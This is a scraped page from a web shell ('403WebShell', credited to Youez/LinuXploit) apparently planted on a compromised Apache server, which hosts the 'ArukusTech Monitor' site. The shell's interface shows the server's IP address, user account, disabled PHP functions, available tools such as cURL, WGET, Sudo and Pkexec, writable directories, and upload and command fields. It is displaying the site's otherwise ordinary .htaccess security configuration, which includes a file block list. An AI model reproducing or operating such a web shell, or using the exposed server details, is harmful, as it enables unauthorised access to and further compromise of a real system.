Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itmtrsrv.arukustech.com/public/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itmtrsrv.arukustech.com/public/.htaccess
# ----------------------------------------------------------------------
# ArukusTech Monitor - Clean URLs + Security Configuration
# ----------------------------------------------------------------------

RewriteEngine On

# ----------------------------------------------------------------------
# 0. Force HTTPS (ONLY if SSL is configured)
# ----------------------------------------------------------------------
RewriteCond %{HTTPS} off
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# ----------------------------------------------------------------------
# 1. Remove .html from URL (Browser Redirect)
# Example: /admin.html ? /admin
# ----------------------------------------------------------------------
RewriteCond %{THE_REQUEST} \s/([^.]+)\.html[\s?] [NC]
RewriteRule ^ /%1 [R=301,L]

# ----------------------------------------------------------------------
# 2. Map Clean URLs to .html files (Internal)
# Example: /admin ? admin.html
# ----------------------------------------------------------------------
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}.html -f
RewriteRule ^(.+)$ $1.html [L]

# ----------------------------------------------------------------------
# 3. Default Index
# ----------------------------------------------------------------------
DirectoryIndex index.html

# ----------------------------------------------------------------------
# 4. Block access to sensitive files
# ----------------------------------------------------------------------
<FilesMatch "\.(env|ini|log|sql|bak|old|sh|py|json|yml|yaml)$">
    Require all denied
</FilesMatch>

# Block git and config directories
RedirectMatch 403 ^/.git
RedirectMatch 403 ^/config
RedirectMatch 403 ^/utils
RedirectMatch 403 ^/venv

# ----------------------------------------------------------------------
# 5. Security Headers (SAFE, FRONTEND ONLY)
# ----------------------------------------------------------------------
<IfModule mod_headers.c>
    Header always set X-Content-Type-Options "nosniff"
    Header always set X-Frame-Options "SAMEORIGIN"
    Header always set Referrer-Policy "strict-origin-when-cross-origin"
    Header always set X-XSS-Protection "1; mode=block"
    
    # Enable HSTS ONLY if HTTPS works properly
    Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
</IfModule>

# ----------------------------------------------------------------------
# 6. Do NOT rewrite API routes (important for FastAPI)
# ----------------------------------------------------------------------
RewriteCond %{REQUEST_URI} ^/api [NC]
RewriteRule ^ - [L]

# ----------------------------------------------------------------------
# 7. Custom 404 (Optional)
# ----------------------------------------------------------------------
# ErrorDocument 404 /index.html

Youez - 2016 - github.com/yon3zu
LinuXploit